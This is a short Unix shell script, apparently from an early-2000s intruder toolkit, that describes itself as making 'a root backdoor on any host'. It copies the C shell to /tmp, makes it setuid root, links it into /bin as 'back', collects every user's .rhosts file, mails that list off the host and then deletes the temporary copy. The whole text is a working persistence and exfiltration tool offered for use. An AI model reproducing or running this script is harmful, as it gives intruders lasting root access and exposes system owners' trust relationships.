#!/bin/sh # Everyone's favorite... # Make a root backdoor on any host # Use this with backdoor makebackdoor and editshadow # admin@wickedmind.com # 06-06-2000 set hostname=`/bin/hostname` cp /bin/csh /tmp/shell chmod 4755 /tmp/shell ln -s /tmp/shell /bin/back find /home/* -name .rhosts > /tmp/.rhosts mail -s "Rhosts files on $hostname:" < /tmp/.rhosts wicked rm /tmp/.rhosts exit 0;